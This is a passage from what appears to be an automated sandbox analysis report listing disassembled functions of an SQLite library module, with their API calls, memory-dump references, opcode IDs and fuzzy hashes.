                                                                                                  • Instruction Fuzzy Hash: F6E11675A082498FDB04CFA8C491A9ABBF2FF49314F298569DC15EB309D734E952CB90
                                                                                                  Function 61E90550 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 61E90589
                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E9059A
                                                                                                  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E905A2
                                                                                                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E905AA
                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E905B9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                  • String ID:
                                                                                                  • API String ID: 1445889803-0
                                                                                                  • Opcode ID: f8aed0544226ad359407b3c77e520ce91c63fa203a3cf3671ee0452ed86cd891
                                                                                                  • Instruction ID: 54b25a955e34b14385b40232b1bf302b809c1dedefd5e4d3fb8d28060c04b12b
                                                                                                  • Opcode Fuzzy Hash: f8aed0544226ad359407b3c77e520ce91c63fa203a3cf3671ee0452ed86cd891
                                                                                                  • Instruction Fuzzy Hash: A211A0729157018FDB10DFB9E48854FBBE4FB89758F050D3AE959C7200EB30D8888BA2
                                                                                                  Function 61E751E6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E751FF
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E7540F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID: BINARY$INTEGER
                                                                                                  • API String ID: 1477753154-1676293250
                                                                                                  • Opcode ID: 6ec2811a4f5dc2dbf774361df0d23a1ce34919f579dba9ad2edf1d90fcd0351a
                                                                                                  • Instruction ID: 2c94a2642b56053fc400a7cff7302c238e57056a299c5557b0cb556c45dd2a72
                                                                                                  • Opcode Fuzzy Hash: 6ec2811a4f5dc2dbf774361df0d23a1ce34919f579dba9ad2edf1d90fcd0351a
                                                                                                  • Instruction Fuzzy Hash: FD711574A0565A9FEB10CFA9D480B9EBBF1BF88718F25C029EC589B354D774E841CB90
                                                                                                  Function 61E4596B Relevance: 6.4, APIs: 4, Instructions: 422COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E45980
                                                                                                    • Part of subcall function 61E13056: sqlite3_mutex_try.SQLITE3(?,?,?,61E130D6), ref: 61E12FF6
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E45999
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E45AB2
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E45EBD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                  • String ID:
                                                                                                  • API String ID: 2068833801-0
                                                                                                  • Opcode ID: 8dcebeb7b9c6a2fb0b998c27f2fe8a2483dfd0f63237319685a825cff2851e65
                                                                                                  • Instruction ID: 5b382c5a34885783c4253a3cb71f5b9359be859a6d8d8cafcbddedc94be3017b
                                                                                                  • Opcode Fuzzy Hash: 8dcebeb7b9c6a2fb0b998c27f2fe8a2483dfd0f63237319685a825cff2851e65
                                                                                                  • Instruction Fuzzy Hash: A6020574A04259CFDB08CFA9E490A9DBBF2BF88318F25C459E855AB355D734EC42CB80
                                                                                                  Function 61E2B21E Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_bind_int64.SQLITE3 ref: 61E2B260
                                                                                                    • Part of subcall function 61E2B08E: sqlite3_mutex_leave.SQLITE3 ref: 61E2B0CD
                                                                                                  • sqlite3_bind_double.SQLITE3 ref: 61E2B283
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465616180-0
                                                                                                  • Opcode ID: c8afb7cc7cf665b3b4084d60f47e74573120cc9ce135541d746cc0ade45b3924
                                                                                                  • Instruction ID: 9f09ce7b3167d82b22f417964929e85369e556cb7cb0216e3e9b89b8dd2b587c
                                                                                                  • Opcode Fuzzy Hash: c8afb7cc7cf665b3b4084d60f47e74573120cc9ce135541d746cc0ade45b3924
                                                                                                  • Instruction Fuzzy Hash: 83217AB19087049FDB04DF59D4A02A9BBE0EF8A720F24C55EEDA84B391D334D991CB82
                                                                                                  Function 61E2B305 Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E2B31F
                                                                                                  • sqlite3_bind_zeroblob.SQLITE3 ref: 61E2B344
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B364
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2187339821-0
                                                                                                  • Opcode ID: 1925c145a1202d43cde5b35b98a32ffb7f5592507b25d06d1c066ea108549ba0
                                                                                                  • Instruction ID: d4772e9183f069c7cb2ead6be10b8fdf1e05d2f7480bf87a2ba2c77d1c7bf065
                                                                                                  • Opcode Fuzzy Hash: 1925c145a1202d43cde5b35b98a32ffb7f5592507b25d06d1c066ea108549ba0
                                                                                                  • Instruction Fuzzy Hash: 92012878A046198FCB00DF69C0D095EBBF5FF8A764B24C469E8488B314D770E851CB92
                                                                                                  Function 61E10104 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E10092
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E100F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  • Opcode ID: 49cb437bd0d43d999436603dd6261fc875446bcfe0b2766a0caec47a78f67710
                                                                                                  • Instruction ID: 7b497c6b0da6e822774e908629dd9a9f2f1e181ad7e8846ffc33eb37c9db2c96
                                                                                                  • Opcode Fuzzy Hash: 49cb437bd0d43d999436603dd6261fc875446bcfe0b2766a0caec47a78f67710
                                                                                                  • Instruction Fuzzy Hash: 46214430A046058FCB04DFA9C485BE9FBF0FF49314F1485A9E918AB392D375D991CB90
                                                                                                  Function 61E0FFB4 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E0FFCA
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E10015
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  • Opcode ID: 3ff2f38d5506a528f6ab4ad41f3da0c64eceb7abbc6003bdd5ec077d1faa45a3
                                                                                                  • Instruction ID: e052ccb6fc1ead5d55a38ec4fd8c557a6f892494bfd229b73208c253049ea377
                                                                                                  • Opcode Fuzzy Hash: 3ff2f38d5506a528f6ab4ad41f3da0c64eceb7abbc6003bdd5ec077d1faa45a3
                                                                                                  • Instruction Fuzzy Hash: F201D6365085508FC7009F75C4C0B99BBB5EF85314F19826ADC588F356C734D5A2C7A1
                                                                                                  Function 61E2AF00 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2AEE2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  • Opcode ID: ef111e0a30148e5b2abbdcc5292d76e9f24a36f22845e0611f08d2daf86b3638
                                                                                                  • Instruction ID: d19eb9d4a37df15e49375229e3cefd1b29fac61782fb14d73c29219a4b165f59
                                                                                                  • Opcode Fuzzy Hash: ef111e0a30148e5b2abbdcc5292d76e9f24a36f22845e0611f08d2daf86b3638
                                                                                                  • Instruction Fuzzy Hash: A9314C74A046498FCB04DF69C4D0AAEBBF5FF89224F248169E818D7350D735DD52CB91
                                                                                                  Function 61E2B134 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B193
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  • Opcode ID: ea78cb19aac8412dbf60e5bf8761ab3f489372b403889683f32b3ca341b289e7
                                                                                                  • Instruction ID: 7f5f319ab59c412892a36ec2d286a52915ef63e50673ec18c8f82fe22844a80b
                                                                                                  • Opcode Fuzzy Hash: ea78cb19aac8412dbf60e5bf8761ab3f489372b403889683f32b3ca341b289e7
                                                                                                  • Instruction Fuzzy Hash: 5B111270A0420A8BDB04CF5AD4C095ABBE5FF89264B20C62EE8588B301C734E991CB91
                                                                                                  Function 61E2B1B1 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B20F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  • Opcode ID: a0b3ab09cb60e2516afc3854012c70aff0d7805f57c9caf0ead8b1fa30b1f797
                                                                                                  • Instruction ID: 081b8a2646824f100a2c862059acc6bdffb72afa31fd4d2c915bf0782fa1234b
                                                                                                  • Opcode Fuzzy Hash: a0b3ab09cb60e2516afc3854012c70aff0d7805f57c9caf0ead8b1fa30b1f797
                                                                                                  • Instruction Fuzzy Hash: DA014B307003068BC700CF6AD4C0A4AFBA5FF89368F18C669E8188B312D375E991CBD0
                                                                                                  Function 61E2B029 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B07F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  • Opcode ID: 0ff13f9741b0decc0edb46f526ac27d82cb66c2a0572d500b160e3403bfbb430
                                                                                                  • Instruction ID: f81ef15fc2c98ccf31154b974238dc2f757c39bee3ff16d1de9a75e49f86efb0
                                                                                                  • Opcode Fuzzy Hash: 0ff13f9741b0decc0edb46f526ac27d82cb66c2a0572d500b160e3403bfbb430
                                                                                                  • Instruction Fuzzy Hash: 44F0A43460061ACBCB00AF65D8C489DFBB4FF88369B11C164E9949B315D734D925CB91
                                                                                                  Function 61E2B08E Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B0CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  • Opcode ID: 8f84362a7d85dd36416fda680d75f4fc71b607c47d30d3503545f179c2e57b8a
                                                                                                  • Instruction ID: 057c2e4f0ecb0fda3e2ea6b2653d14147eeb3facb52258f923508af585d19611
                                                                                                  • Opcode Fuzzy Hash: 8f84362a7d85dd36416fda680d75f4fc71b607c47d30d3503545f179c2e57b8a
                                                                                                  • Instruction Fuzzy Hash: CFF0543570020A9B8B00DF69D9C0C8E77F9EF89268B14D115EC149B315D334ED52CF91
                                                                                                  Function 61E2B103 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B126
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  • Opcode ID: cc58d19f12f303b046da564438251b0c85c3a62fc1815a51b6445f5ac72be5e5
                                                                                                  • Instruction ID: c5b6e7e7b08836179348b9a9ba3afde214f5ad3045681144f2a9657083424eff
